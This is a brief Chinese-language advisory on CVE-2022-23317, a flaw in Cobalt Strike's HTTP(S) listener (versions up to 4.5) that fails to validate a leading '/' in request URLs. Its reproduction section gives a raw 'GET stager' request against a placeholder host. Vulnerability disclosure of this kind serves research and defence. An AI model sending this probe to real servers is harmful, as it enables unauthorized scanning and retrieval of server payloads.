CVE-2022-23317

漏洞描述

CobaltStrike的HTTP(S)监听器对请求URL未进行"/“开头验证，攻击者可通过指定URL获取相关信息。

影响范围

• CobaltStrike <= 4.5

漏洞复现

1
2
3

GET stager HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0

参考链接

• CVE-2022-23317